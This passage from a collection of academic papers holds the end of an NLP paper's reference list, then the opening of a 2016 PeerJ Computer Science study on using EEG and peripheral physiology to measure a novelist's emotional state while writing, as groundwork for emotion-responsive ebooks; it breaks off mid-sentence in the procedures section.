embedding. In Proceedings of ICLR, Toulon, France. Minh-Thang Luong, Hieu Pham, and Christopher D. Manning. 2015. Effective approaches to attention-based neural machine translation. In Proceedings of EMNLP, pages 1412–1421, Lisbon, Portugal. Yishu Miao, Lei Yu, and Phil Blunsom. 2016. Neural variational inference for text processing. In Proceedings of ICML, pages 1727–1736, New York City, USA. Tomas Mikolov, Ilya Sutskever, Kai Chen, Gregory S. Corrado, and Jeffrey Dean. 2013. Dis- tributed representations of words and phrases and their compositionality. In Proceedings of NIPS, pages 3111–3119, Lake Tahoe, USA. Lili Mou, Rui Men, Ge Li, Yan Xu, Lu Zhang, Rui Yan, and Zhi Jin. 2016. Natural language in- ference by tree-based convolution and heuristic matching. In Proceedings of ACL, pages 130–136, Berlin, Germany. Tsendsuren Munkhdalai and Hong Yu. 2017. Neural semantic encoders. In Proceedings of EACL, pages 397–407, Valencia, Spain. Ramesh Nallapati, Bowen Zhou, Cícero Nogueira dos Santos, Çaglar Gülçehre, and Bing Xiang. 2016. Abstractive text summarization using sequence-to-sequence rnns and beyond. In Pro- ceedings of CoNLL, pages 280–290, Berlin, Germany. Ankur P. Parikh, Oscar Täckström, Dipanjan Das, and Jakob Uszkoreit. 2016. A decomposable attention model for natural language inference. In Proceedings of EMNLP, pages 2249–2255, Austin, USA. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. GloVe: Global vectors for word representation. In Proceedings of EMNLP, pages 1532–1543, Doha, Qatar. Matthew E. Peters, Mark Neumann, Mohit Iyyer, Matt Gardner, Christopher Clark, Kenton Lee, and Luke Zettlemoyer. 2018. Deep contextu- alized word representations. In Proceedings of NAACL-HLT, pages 2227–2237, New Orleans, USA. Adam Poliak, Jason Naradowsky, Aparajita Haldar, Rachel Rudinger, and Benjamin Van Durme. 2018. Hypothesis only baselines in natural 701 language inference. In Proceedings of *SEM, pages 180–191, New Orleans, USA. Benjamin Riedel, Isabelle Augenstein, Georgios P. Spithourakis, and Sebastian Riedel. 2017. A simple but tough-to-beat baseline for the fake news challenge stance detection task. CoRR, abs/1707.03264. Tim Rocktäschel, Edward Grefenstette, Karl Moritz Hermann, Tomáš Kočiskỳ, and Phil Blunsom. 2016. Reasoning about entailment with neural attention. In Proceedings of ICLR, San Juan, Puerto Rico. Cícero Nogueira dos Santos, Ming Tan, Bing Xiang, and Bowen Zhou. 2016. Attentive pool- ing networks. CoRR, abs/1602.03609. Min Joon Seo, Aniruddha Kembhavi, Ali Farhadi, and Hannaneh Hajishirzi. 2017. Bidirectional attention flow for machine comprehension. In Proceedings of ICLR, Toulon, France. Lifeng Shang, Zhengdong Lu, and Hang Li. 2015. Neural responding machine for short- text conversation. In Proceedings of ACL, pages 1577–1586, Beijing, China. Rupesh Kumar Srivastava, Klaus Greff, and Jürgen Schmidhuber. 2015. Training very deep networks. In Proceedings of NIPS, pages 2377–2385, Montreal, Canada. James Thorne, Andreas Vlachos, Christos Christodoulopoulos, and Arpit Mittal. 2018. FEVER: A large-scale dataset for fact extraction and verification. In Proceedings of NAACL- HLT, pages 809–819, New Orleans, USA. Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N. Gomez, Lukasz Kaiser, and Illia Polosukhin. 2017. At- tention is all you need. In Proceedings of NIPS, pages 6000–6010, Long Beach, USA. Shuohang Wang and Jing Jiang. 2016. Learn- ing natural language inference with LSTM. In Proceedings of NAACL-HLT, pages 1442–1451, San Diego, USA. Shuohang Wang and Jing Jiang. 2017. Machine comprehension using match-LSTM and an- swer pointer. In Proceedings of ICLR, Toulon, France. Wenhui Wang, Nan Yang, Furu Wei, Baobao Chang, and Ming Zhou. 2017a. Gated self- matching networks for reading comprehension and question answering. In Proceedings of ACL, pages 189–198, Vancouver, Canada. Zhiguo Wang, Wael Hamza, and Radu Florian. 2017b. Bilateral multi-perspective matching for natural language sentences. In Proceedings of IJCAI, pages 4144–4150, Melbourne, Australia. Caiming Xiong, Stephen Merity, and Richard Socher. 2016. Dynamic memory networks for visual and textual question answering. In Pro- ceedings of ICML, pages 2397–2406, New York City, USA. Caiming Xiong, Victor Zhong, and Richard Socher. 2017. Dynamic coattention networks for question answering. In Proceedings of ICLR, Toulon, France. Wenpeng Yin, Hinrich Schütze, Bing Xiang, and Bowen Zhou. 2016. ABCNN: Attention-based convolutional neural network for modeling sen- tence pairs. TACL, 4:259–272. 702 work_eqip4jy63vbmti4clx5saaqwbi ---- Submitted 12 October 2015 Accepted 11 April 2016 Published 23 May 2016 Corresponding author Jan B.F. van Erp, jan.vanerp@tno.nl Academic editor Sally Jo Cunningham Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.60 Copyright 2016 van Erp et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Toward physiological indices of emotional state driving future ebook interactivity Jan B.F. van Erp1,2, Maarten A. Hogervorst1 and Ysbrand D. van der Werf3 1 Perceptual and Cognitive Systems, TNO, Soesterberg, The Netherlands 2 Human Media Interaction, University of Twente, Enschede, The Netherlands 3 Anatomy & Neurosciences, VU University Medical Center, Amsterdam, The Netherlands ABSTRACT Ebooks of the future may respond to the emotional experience of the reader. (Neuro-) physiological measures could capture a reader’s emotional state and use this to enhance the reading experience by adding matching sounds or to change the storyline therewith creating a hybrid art form in between literature and gaming. We describe the theoretical foundation of the emotional and creative brain and review the neurophysiological indices that can be used to drive future ebook interactivity in a real life situation. As a case study, we report the neurophysiological measurements of a bestselling author during nine days of writing which can potentially be used later to compare them to those of the readers. In designated calibration blocks, the artist wrote emotional paragraphs for emotional (IAPS) pictures. Analyses showed that we can reliably distinguish writing blocks from resting but we found no reliable differences related to the emotional content of the writing. The study shows that measurements of EEG, heart rate (variability), skin conductance, facial expression and subjective ratings can be done over several hours a day and for several days in a row. In follow-up phases, we will measure 300 readers with a similar setup. Subjects Human–Computer Interaction, Brain–Computer Interface, Multimedia Keywords Creativity, Reading, Emotion, Neurophysiology, Brain–computer interfaces, Ebook, Interactivity, EEG, Multimedia, Human–computer interaction INTRODUCTION The sales of ebooks are rapidly increasing and are expected to surpass that of printed books in the near future. In its basic form, an ebook is an electronic version of the printed book. However, the devices used to access an ebook (ereader, tablet, etc.) have more capabilities than just displaying the book and turning pages on request of the reader. The device may enable true bidirectional interaction with the reader, which is a significant innovation compared to the one-directional printed book. This interactivity may substantially change the future of the ebook as artistic form and may result in new interactive media products that only slightly resemble the basic version of the printed book as sold today. Together with scientific and cultural organizations we have started to explore the potential of interactive ebooks. One of the key questions is which reader parameter or actions (other than turning pages) are useful for interactive ebooks. One of the driving forces behind this exploration was the prominent Dutch writer Arnon Grunberg who also had a genuine interest in what his readers actually experience while reading his work, or How to cite this article van Erp et al. (2016), Toward physiological indices of emotional state driving future ebook interactivity. PeerJ Comput. Sci. 2:e60; DOI 10.7717/peerj-cs.60 https://peerj.com mailto:jan.vanerp@tno.nl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.60 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.60 more generally stated: ‘‘Is reading a novel good for you?’’ (the writer himself takes a devil’s advocate stance and postulates the possibility that reading literature has a detrimental influence (Grunberg, 2013)). From neuroscientific data, we know that reading is a complex task involving many brain areas (He et al. (2013), see Carreiras et al. (2014) for a recent review and Nijhof & Willems, (2015) for individual differences in narrative comprehension) and that reading can (at least temporarily) alter connectivity in an individual’s brain (Dehaene et al., 2015; Berns et al., 2013). However, just reading text doesn’t make one more social or empathetic. This may only happen after so-called ‘‘emotional transportation’’ (Bal & Veltkamp, 2013; Johnson, 2012), i.e., as a reader one needs to be involved at an emotional level. It is postulated that there are no effects of reading non-fiction and also no effects of reading fiction when there is no emotional transportation (Kidd & Castano, 2013). A similar concept (immersion) is used in the ‘‘fiction feeling hypothesis’’ (Hsu, Conrad & Jacobs, 2014) which postulates that negative, high arousal text activates the affective empathic network (Walter, 2012) which facilitates immersion in the text. In an experiment, participants read neutral and fearful sections of the Harry Potter saga and the results indeed showed a relation between neuronal activation pattern and subjectively rated immersion. Emotional experience is not only an essential catalyst, but also important in choosing which book to read, experiencing the content (Johansen, 2010) and interpreting the narrative (Mar et al., 2011). All the above led us to develop a research project to measure readers’ emotions while reading an ebook. Emotional state can be a key parameter to drive interactivity in future ebooks and may be viable in a real-life situation using recent Brain–Computer Interface (BCI) technology. In addition, we were interested in measuring the emotions of the writer during the writing process to be able to compare the reader’s emotional state while reading a certain paragraph to that of the author during writing that same paragraph. Capturing the emotional state of the writer (both through neurophysiology and subjective ratings) became our case study and is reported in this paper to illustrate the use of sensor technology and to investigate whether prolonged physiological measurements are feasible in a real life situation. The framework described here is the basis for follow-up studies in which several hundreds of readers will read the book before publication while being measured with a similar setup as used here with the author (Brouwer et al., 2015). The applied, real life perspective guided the selection of theoretical models and measurement methods. Art, beauty and neuroscience There is a growing interest in using neurophysiological measures to assess media, including paintings, music and films. Research in this area is still at the forefront of cognitive neuroscience and results and theoretical foundations are still under debate. An important question that has fascinated and divided researchers from both the neurosciences and the humanities is whether brain activity can provide insight in what true art and beauty is. From an applied point of view, the relevant question is whether an individual’s brain pattern is informative of his or her appraisal of the piece of art. Research of Zeki and colleagues, amongst others, has shown that there is a functional specialization for perceptual versus aesthetic judgments in the brain (Ishizu & Zeki, 2013) and that there is a difference in van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 2/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 activation pattern for paintings experienced as beautiful by an individual and those experienced as ugly. This finding is independent of the kind of painting: portrait, landscape, still life, or abstract (Kawabata & Zeki, 2004). Hasson and colleagues (2008) used fMRI to assess the effects of different styles of filmmaking on brain patterns and suggest that neurophysiological sensing techniques can be used by the film industry to better assess its products. The latter was done by Fleureau, Guillotel & Orlac (2013) who measured skin conductance as an affective benchmark for movies and by Golland, Keissar & Levit-Binnun (2015) who measured cardiovascular and electrodermal signals and found a high degree of simultaneity between viewers, but also large individual differences with respect to effect size. So far, interactivity based on viewers emotional state has not moved beyond a few artistic experiments: ‘‘unsound’’ by Filmtrip and SARC (http://www.filmtrip.tv/) and ‘‘Many Worlds’’ by Alexis Kirke (http://www.alexiskirke.com/). In this paper we look at the (applied) neuroscience behind both the creative and the emotional brain and how emotional state can be captured using wearable, mobile technology that is usable while reading an ebook. We will also explore the possibilities opened up after capturing a reader’s emotional state and what the ebook of the future might look like. The paper also presents the data of the writer during the creation of emotional text (Van der Werf & Van Erp, 2014). THE EMOTIONAL BRAIN Stimuli evoking emotions are processed in the brain through specific pathways and with the involvement of several brain areas. In other words, the emotional brain is a network of collaborating brain areas and not a single location (Dalgleish, 2004; Tovote, Fadok & Luthi, 2015). The majority of the sensory information entering the brain goes to the primary sensory areas, but a small part of the information goes to the amygdala, part of the limbic system deep inside the human brain. A main driver of the amygdala is danger: in case of a potential threat to the organism, the amygdala is able to respond quickly and prepare the body for action without much stimulus processing. The amygdala enables the release of stress hormones leading to peripheral effects, for instance increased heart rate to pump more blood to the lungs and muscles. After the amygdala, processing continues through the cingulate cortex, the ventromedial prefrontal cortex and finally the dorsolateral prefrontal cortex. Only in the dorsolateral prefrontal cortex is the processing stream through the amygdala integrated with the more cognitive processing stream from the sensory cortices. The emotional experience is a result of the interpretation of both processing routes taking into account the context and previous experiences. This integration and interpretation of information is a typical function of the prefrontal cortex (Isotani et al., 2002). Psychological framework of emotions Before we can discuss how we can measure emotional state, we should first look into the frameworks to classify emotions. There are many psychological frameworks available. Classic work by Ekman (1992) and Russell (1980) shows that there are several basic emotions: fear, disgust, anger, happiness, sadness and surprise. This set of six basic emotions has been expanded through the years with numerous subclasses. From a neuroscientific van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 3/26 https://peerj.com http://www.filmtrip.tv/ http://www.alexiskirke.com/ http://dx.doi.org/10.7717/peerj-cs.60 point of view, an important question is whether these emotions each have their own (unique) neuronal location or circuit (i.e., a discrete model (Barrett & Russell, 1999)), or vary along several independent dimensions (i.e., a dimensional model (Mauss & Robinson, 2009)), a matter that is still under debate. As described above, experiencing an emotion is the result of the integration and interpretation of numerous information streams by an extended network of brain areas which makes a discrete model unlikely. Therefore, we adopt a dimensional model, or more specifically the circumplex model of emotion (Russell, 1980; Russell & Barrett, 1999; Posner, Russell & Peterson, 2005) in which emotions are plotted in two dimensions: arousal and valence. For instance, anger is linked to negative valence and high arousal, sadness to negative valence and low arousal, and happiness to positive valence and high arousal and contentment to positive valence and low arousal. This model is commonly used to investigate for instance emotional words, facial expressions, and affective states. The circumplex model of emotion stems from the ratings of individual, written words. Neuro imaging studies confirm the two-dimensional model of valence and arousal and although there may be complex interactions between both dimensions, they both have a different signature of brain activation, spatially as well as temporally. Arousing words show a different pattern (compared to neutral words) mainly in the early processing stages (i.e., within 400 ms after presentation including the following ERP components: early posterior negativity (EPN), P1, N1, P2, and N400) while the difference between positively versus negatively valenced words shows in later processing stages (between 500 and 800 ms after presentation including the late positive complex (LPC)) (Rellecke et al., 2011). In the spatial domain, arousal is linked to amygdala activity and valence to the cingulate cortex and the orbitofrontal cortex (Colibazzi et al., 2010; Herbert et al., 2009; Kuchinke et al., 2005; Lewis et al., 2007; Posner et al., 2009). Excellent reviews are given by Kissler, Assadollahi & Herbert (2006) and Citron (2012). Based on her review, Citron (Citron, 2012) comes to the conclusion that positive and negative valence may differ with respect to the cognitive functions they activate and are not necessarily a continuous dimension. Although a novel is more than a collection of individual words, there has been very little research on the physiological reactions to reading larger pieces of text (see the first section of this paper), but a lot to reading individual words. This project aims to fill that void. Emotion classification using neurophysiological measures With the circumplex model as point of departure, we can start to identify physiological signals that reflect the arousal and valence of emotions and that can potentially be measured while reading outside a laboratory environment. We will look at a broader range of methods used to induce an emotional state than written words and at a broader set of physiological measures than EEG and fMRI. For example, Min, Chung & Min, (2005) induced emotional state by letting subjects imagine pleasant, unpleasant, aroused and relaxed situations and measured effects on EEG, heartrate, skin conductance, skin temperature and respiration. Valence Valence requires central nervous system indices as it is less clearly reflected in peripheral measures. Wearable sensors like EEG are not able to measure activity in deeper structures van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 4/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 like the limbic system but as reviews show (Kissler, Assadollahi & Herbert, 2006; Citron, 2012), valence is strongly linked to later processing stages involving more superficial brain structures related to cognitive processing. Valence is reflected in (late) ERP components (Bayer, Sommer & Schacht, 2010; Herbert, Junghofer & Kissler, 2008; Holt, Lynn & Kuperberg, 2009), in the power in specific EEG frequency bands like alpha (Bahramisharif et al., 2010; Klimesch, Sauseng & Hanslmayr, 2007), in the relative power in different EEG bands (Ko, Yang & Sim, 2009) and in asymmetrical alpha activity in the prefrontal cortex (Isotani et al., 2002; Fox, 1991; Schmidt & Trainor, 2001; Tomarken et al., 1992) indicating increased left prefrontal cortex activity for positive valence and increased right prefrontal cortex for negative valence. However, power in the different frequency bands and hemispheric asymmetry are under the influence of many factors, which may only partially correspond to emotional valence. For example, hemispheric asymmetry has been linked to stress (Lewis, Weekes & Wang, 2007) and the tendency to approach versus to avoid stimuli (Verona, Sadeh & Curtin, 2009), and low power in the alpha band may be caused by the fact that stimuli with high valence may attract more attention (Brouwer et al., 2009; Muehl et al., 2011). Arousal Arousal is less clearly linked to brain activation patterns except for activity in the amygdala and the reticularformation (Posner, Russell & Peterson, 2005), which aredifficult to measure with wearable sensors like EEG. However, arousal is reasonably clearly reflected through a relatively strong activation of the sympathetic as compared to the parasympathetic autonomous nervous system. Arousal can be measured peripherally through, for instance, skin conductance (increasing conductance with increasing arousal (Roth, 1983)), heart rate variability (HRV), especially high frequency HRV as this is exclusively affected by the parasympathic system (reduced high frequency HRV with increased arousal (Berntson et al., 1997)), pupil size, heart rate (HR) and respiration frequency (all increased with increased arousal, although this pattern is not consistent over studies, see Kreibig (2010) for an elaborate overview). Current state of the art in (applied) emotion capture The state-of-the-art in emotion detection using neurophysiological indices is that we are able to distinguish several valence and arousal levels in a lab environment when subjects are sitting still and sufficient control data is gathered beforehand to train classification algorithms (see Van Erp, Brouwer & Zander (2015) for an overview). However, it is important to note that the relation between physiology and emotion is not straightforward. Different studies with different stimuli and contexts report different types of correlations (Kreibig, 2010; Dockray & Steptoe, 2010). It is thus important to study relations between (neuro-) physiology and emotion within the context and under the circumstances of interest (Brouwer et al., 2015; Van Erp, Lotte & Tangermann, 2012). An important step in this project, is to bring neurophysiological signals out of the lab and explore their potential value in daily life (Van Erp, Brouwer & Zander, 2015; Van Erp, Lotte & Tangermann, 2012). Monitoring and using the (neuro-) physiological signals of van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 5/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 readers is new, and entertainment in general is a good first case to transfer the technology from the laboratory to real life. This transition will come with several challenges ranging from coping with external noise due to movement artifacts, multitasking users, and usability aspects such as prolonged usage (Van Erp, Lotte & Tangermann, 2012; Van Erp et al., 2013; Van Erp et al., 2011). First steps in this transition have recently been made in studies investigating EEG signals in gaming (Reuderink, Mühl & Poel, 2013) and into music perception in realistically moving participants (Leslie, Ojeda & Makeig, 2014). Here we also present the case of the writer wearing physiological sensors for several hours a day and for 9 days in a row. THE CREATIVE BRAIN The current case study focused on the writer and his emotional signals during the creative writing process. Our primary goal was to implement and learn about the transition from laboratory to real life before upscaling the set-up to hundreds of readers, and to capture the emotional signals of the writer as function of the emotional content of the written paragraphs. We deemed it worthwhile, nevertheless, to have a quick look at the creative brain as well. Most people would agree that creative abilities make us unique in the animal kingdom. Interestingly, we understand little of the processes that drive or facilitate creativity and still debate on the definition of creativity, although most agree upon the importance of both novelty and usefulness (see Piffer (2012) for an elaborate discussion). Similar to the neuroscience of art and beauty, neuroscientific research into creativity can still be characterised as embryonic and neuroscientific models are not widely established yet. Like emotion, creativity is not related to a single brain area but rather to networks of brain areas. Based on an extensive review, Dietrich & Kanso (2010) even stated that ‘‘creativity is everywhere’’; see also Arden et al. (2010). Having said that, recent neuroimaging studies seem to show that creativity involves common cognitive and emotional brain networks also active in everyday tasks, especially those involved in combining and integrating information. For the current project, it is useful to distinguish two different types of creative processes as described by Dietrich (2004). The first can be called controlled creativity often in relation to finding creative solutions for a particular, given problem. This creative process is controlled through the prefrontal cortex (Ellamil et al., 2012) that guides the search for information and the combination of information within a given solution space. A powerful mechanism which is bound, though, by limitations of the prefrontal cortex; for instance, with respect to the number of solutions that can be processed in working memory. The second type can be named spontaneous creativity, often in relation to artistic expression. This form of creativity comes without the restrictive control from the prefrontal cortex, and the process differs from controlled creativity qualitatively (e.g., solutions are not bound by rational rules like the rules of physics) and quantitatively (the number of solutions is not restricted by for instance the limited capacity of working memory). Spontaneous creativity is linked to unconscious processes (of which dreaming may be an extreme form). However, the prefrontal cortex becomes involved in spontaneous creativity when solutions will eventually reach the conscious mind, and the prefrontal cortex is required to evaluate them and bring them to further maturity. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 6/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Recent data show us that less activity in the dorsolateral prefrontal cortex links to increased spontaneous creativity in, for instance, musicians (Limb & Braun, 2008; Liu et al., 2012), and increased activation to increased controlled creativity. Results also show that there is a burst of wide-spread gamma activity about 300 ms before the moment of insight in spontaneous creativity. Gamma activity is, amongst other features, linked to binding pieces of information. A burst of gamma activity is indicative of finding (and binding) a new combination of chunks of (existing) information. Fink & Benedek (2014) underline the importance of internally oriented attention during creative ideation in a more general sense, reflected in an increase in alpha power. Creativity is also linked to hemispheric asymmetry. A meta-analysis (Mihov, Denzler & Förster, 2010) showed that the right hemisphere has a larger role in creative processes than the left hemisphere. This is confirmed by patient research (Mayseless, Aharon-Peretz & Shamay-Tsoory, 2014; Shamay-Tsoory et al., 2011). A lesion in the right medial prefrontal cortex hinders the creation of original solutions while a lesion in the left medial prefrontal cortex seems to be beneficial for spontaneous creativity. However, experiments with creative students (Carlsson, Wendt & Risberg, 2000) and extremely creative professionals from science and arts (Chávez-Eakle et al., 2007) both show bilateral cerebellum involvement, seemingly confirming the statement that ‘‘creativity is everywhere in the brain.’’ However, these findings are general findings and may not be applicable to the creative writing process (Shah et al., 2013). For instance, creative writing seems to result in increased activity in the left prefrontal cortex (presumably because of its links to important language areas in the left hemisphere) except when writing emotional text, for which activity in the right hemisphere seems to be greater. This shows that the body of knowledge on the creative brain is growing but still limited and identifying neural correlates of the creative writing process requires further research. Another interesting debate is whether creative writing is a skill one can develop like skilled behavior in sports and music, or possibly even non-creative, non-fiction writing like scientists and journalists do. Lotze and colleagues found that the caudate nucleus (involved in skilled behavior) was active in experienced creative writers but not in novices (Erhard et al., 2014; Lotze et al., 2014), indicating that creative writing can indeed be a (trainable) skill. THE CASE STUDY Methods Participant Arnon Grunberg (http://www.arnongrunberg.com/) participated in the study. Arnon Grunberg was born in 1971 and has lived in New York since 1995. He writes novels, short stories, columns, essays and plays. His work was awarded with several national and international prizes and translated into 30 languages. He participated voluntarily, being aware that his participation would not be anonymous. All data were collected in November 2014 in Arnon’s apartment in New York. The Institutional Review Board of TNO Human Factors (TCPE Soesterberg, The Netherlands) approved the study after inclusion of specific sections in the informed consent regarding privacy and data dissemination. Arnon read and signed the informed consent before data gathering began. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 7/26 https://peerj.com http://www.arnongrunberg.com/ http://dx.doi.org/10.7717/peerj-cs.60 Figure 1 Location of the 28 electrodes in the 10–20 system. Apparatus We used commercially available hardware and software to record physiological parameters, facial expression and text entry. In addition, paper and pencil were used for subjective questionnaires described in the next section. All neurophysiological signals were recorded using a wearable Mobita R© 32-channel physiologic signal amplifier system sampling at 1,000 Hz (TMSi, Hengelo, The Netherlands, http://www.tmsi.com/). The available channels were used for EEG (28 TMSi water based electrodes, see Fig. 1 for the layout of the electrodes), ECG (two pre-gelled disposable TMSi snap electrodes) and Endosomatic Skin Potential ESK (pair of TMSi finger electrodes). The Mobita R© has built-in accelerometers which we used to log possible activity of the writer and to synchronize the physiological data to other data gathered through a Noldus Observer XT R© system (Noldus IT, Wageningen, The Netherlands; http://www.noldus.com/). This system recorded the images from two IP cameras (one providing an overview of the work space and one providing a close-up of the writer’s face for later analysis of his facial expression), a continuous screen dump of the writer’s PC screen, and the writer’s keystrokes (Noldus uLog tool R©). The writer used his normal work space and own PC, see Fig. 2. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 8/26 https://peerj.com http://www.tmsi.com/ http://www.noldus.com/ http://dx.doi.org/10.7717/peerj-cs.60 Figure 2 Writer showing the neurophysiological sensors (A) and during writing (B). Table 1 Experimental protocol for one day. Start of the day Instrumentation of the participant and check of measurement systems Calibration of emotional state Subjective questionnaires: feelings grid, VAS, DES full Block 1 Continuous monitoring of physiology and facial expression Continuous logging of text entry Continuous observation by experimenter Subjective questionnaires at significant eventsa: feelings grid, DES self Subjective questionnaires at end of block: feelings grid, VAS, DES self, DES book Block 2 Similar to Block 1 End of the day Subjective questionnaires: feelings grid, VAS, DES full Open Questions Notes. aSignificant events could include a writer’s block, or moment of great insight etc. to be identified by the participant himself. Eventually, no ‘significant events’ were indicated. Experimental protocol Table 1 gives the outline of the experimental protocol for one day. Table 2 gives the details on the experimental protocol. Data processing Our intention was to use the calibration sessions of each day to identify differences in physiological markers that could be linked to the emotional content of the written paragraph. When we can reliably establish this ‘ground truth,’ it could consecutively be used to analyze the data gathered during the writing blocks. After checking the synchronization between the different data streams, the physiological data of the calibration session were van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 9/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Table 2 Specification of the experimental protocol. Instrumentation of the participant and check of measurement systems The physiological sensors were attached to the writer and signals checked for their integrity. Video cameras, screen and keyboard logging were switched on and checked. The Mobita recorder was time linked to the Observer XT sys- tem by using the Mobita to type a specific series of key strokes recorded by the accelerometers in the Mobita, the uLog module of the Observer XT and the overview camera. Calibration of emotional state •At the beginning of each day the following calibration data were recorded in fixed order: ◦1 min of rest with eyes open ◦1 min of rest with eyes closed ◦6 blocks of 2 min filled with writing a paragraph with the following instruction: ‘‘write a paragraph on this picture with emotion×, as if you are writing a paragraph in your novel.’’ This instruction was ac- companied with an A4 sized, full color picture from the IAPS database (Lang, Bradley & Cuthbert, 2008) matching emotion× (disgust, fear, sadness, amusement, contentment, excitement). We selected 60 pic- tures from the IAPS database, 10 for each emotion: disgust (3061, 7360, 7361, 8230, 9290, 9330, 9373, 9390, 9490, 9830), fear (1052, 1110, 1113, 1301, 1302, 1321, 1931, 3280, 5970, 5972), sadness (2130, 2271, 2312, 2490, 8010, 9120, 9190, 9210, 9331, 9912), amusement (1340, 1810, 1811, 1920, 2092, 2344, 2352, 2791, 7195, 8600), contentment (1500, 2150, 2160, 2058, 2304, 2530, 2550, 2560, 4700, 5201), and excite- ment (8030, 8031, 8034, 8116, 8117, 8200, 8220, 8260, 8370, 8440). The order of the emotions was bal- anced over the days, each picture was only used once during the experiment. ◦1 min of rest with eyes open ◦1 min of rest with eyes closed Feelings grid •The feelings grid (Russell, Weiss & Mendelsohn, 1989) was a pen and paper A4-sized form with the instruction ‘‘Please indicate how you feel RIGHT AT THIS MOMENT. Place an ‘‘X’’ in the box closest to how you are feeling at this time.’’ The form consisted of a 10×10 square grid with the following markers: ◦middle-top: arousal, middle-bottom: sedation, sleepiness ◦ left-middle: unpleasant, right-middle: pleasant ◦ left-top: anger, stress; right-top: joy excitement ◦ left-bottom: depression, sadness; right bottom: relaxation, contentment VAS (visual analog scale) The VAS was a pen and paper test with the instruction ‘‘Please mark how you feel RIGHT AT THIS MOMENT.’’ Four scales were printed on one A4: relaxed–agitated, happy–sad, optimistic–pessimistic, state of flow–no flow. DES full The DES (Fredrickson et al., 2003) full was a paper and pen test with the instruction ‘‘Please indicate how each emo- tion reflects how you feel RIGHT AT THIS MOMENT.’’ It depicted the following 20 items on an A4-sized paper with five tick boxes to their right representing not at all (1)—completely (5): amusement, awe, contentment, grat- itude, hope, love, pride, sexual desire, joy, interest, anger, sad, scared, disgust, contemptuous, embarrassed, repen- tant, ashamed, surprised, sympathetic. DES self The DES self was a paper and pen test with the instruction ‘‘Please mark the emotions that best reflect your feelings over the past measurement period.’’ It contained the same 20 items as the DES full on an A4-sized form but with only one tick box to their right. DES book The DES book was the same as the DES self, except for the instruction: ‘‘Please mark the emotions that best describe the section you wrote in the past measurement period.’’ Open questions During the debriefing, the writer answered several open questions about the use of substances (coffee, tea, cigarettes, medication etc.), the experience of flow, satisfaction about the progress, significant moments during the writing etc. The experimenter could expand the open questions based on observations made during the day. separated in 10 epochs corresponding to 1 min rest eyes open, 1 min rest eyes closed, 6×2 min ‘emotional writing’ (each corresponding to one of six different emotional pictures and descriptors), and again 1 min rest eyes open, 1 min rest eyes closed. EEG. The EEG data were processed using the following pipeline: re-referencing to channel TP10, rejection of channels with very large variance (channels O1, Oz and O2 were very van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 10/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 noisy and removed completely from the dataset), band pass filtering 0.5–43 Hz, and down sampling to 250 Hz. Initialy, the EEG data of the remaining channels were used in an Independent Component Analysis (ICA) to identify and remove potential artifacts. However, the ICA revealed that potential artifacts were non-stationary (i.e., changing over time) and therefore difficult to identify and thus no more data were removed. The power in different frequency bands: delta (0–4 Hz), theta (4–8 Hz), alpha (8–13 Hz), SMR (13–16 Hz), Beta (16–30 Hz) and gamma (30–80 Hz) were used as features in the classification. Peripheral physiology. As a measure of heart rate, we determined the mean interval between successive R-peaks in the ECG (RRI) for each epoch and converted this to mean Heart Rate (meanHR = 1/meanRRI). Four measures of heart rate variability were derived. The root mean squared successive difference between the RRIs (rmssdRRI) reflects high frequency heart rate variability. We also determined heartrate variability in the low, medium and high band using a spectral analysis (HRVlow, HRVmed, HRVhigh). High-frequency heart rate variability was computed as the power in the high frequency range (0.15–0.5 Hz) of the RRI over time using Welch’s method applied after spline interpolation; similarly for mid-frequency (0.07–0.15 Hz) and low-frequency (0–0.07 Hz) heart rate variability. No anomalies were present in the ECG data so no data was removed. From the ESK, the mean ESK over the epochs was calculated. For the ESK we removed one outlier (contentment epoch on day 2). Classification analysis using EEG and peripheral physiology features. To determine how well various feature sets could predict the emotional state of the author during the calibration session we performed a classification analysis. Classification was performed using the Donders Machine Learning Toolbox (Van Gerven et al., 2013). Two types of classifiers were used: a linear Support Vector Machine (SVM) and an elastic net model with logistic regression (Friedman, Hastie & Tibshirani, 2010). As input we used the features that were standardized to have mean 0 and standard deviation 1 on the basis of data from the training set. One-tailed binomial tests were used to determine whether classification accuracy was significantly higher than chance. Facial expression. The images from the close-up camera were analysed offline using Noldus FaceReader software. Output for each epoch are intensity values for the following classifications: Neutral, Happy, Sad, Angry, Surprised, Scared, Disgusted. Subjective questionnaires. The data of the feelings grid, VAS, and DES full questionnaires was not pre-processed but directly analysed. We only statistically analysed the main effects of day (9 levels) and session (start of day and end of day for DES full, and start of day, end of block 1, end of block 2, end of day for feelings grid and VAS). The DES full scores were analysed using non-parametric statistics with alpha level Bonferroni adjusted for the number of comparisons. Feelings grid and VAS scores were analysed with a parametric ANOVA. van Erp et al. (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.60 11/26 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.60 Procedures We started the measurements on the day the writer started with a new novella to be used in phase 2 of the project. We adjusted the measurements to his usual daily writing schedule comprising two blocks: one in the morning and one in the late afternoon or 